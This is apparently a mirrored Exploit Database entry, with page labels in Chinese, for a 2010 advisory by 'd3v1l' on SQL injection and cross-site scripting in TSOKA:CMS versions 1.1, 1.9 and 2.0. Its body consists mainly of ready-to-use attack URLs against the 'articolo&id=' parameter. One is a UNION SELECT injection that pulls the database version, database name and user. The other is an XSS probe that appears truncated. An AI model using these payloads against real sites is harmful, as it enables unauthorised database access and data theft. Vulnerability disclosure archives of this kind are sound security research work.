TSOKA:CMS 1.1/1.9/2.0 – SQL Injection / Cross-Site Scripting

• Exploit Database
• 10 阅读

• 作者： d3v1l
  日期： 2010-03-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11923/

• [~]-----------------------------------------------------------------------------------------------------------------------
  [~] TSOKA:CMS v1.1 , v1.9 AND v2.0 SQL Injection & XSS Vulnerability
  [~]
  [~] http://www.alanzard.com (from italy)
  [~]
  [~]
  [~] ----------------------------------------------------------------------------------------------------------------------
  [~] Bug founded by d3v1l [Avram Marius]
  [~]
  [~] Date: 28.03.2010
  [~]
  [~]
  [~] http://security-sh3ll.blogspot.com
  [~]
  [~] ----------------------------------------------------------------------------------------------------------------------
  [~] articolo&id= SQL & XSS
  [~]
  [~]
  [~] Ex -
  [~]
  [~] http://[site]/?pag=articolo&id=">
  [~] http://[site]/?pag=articolo&id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8--
  [~]------------------------------------------------------------------------------------------------------------------------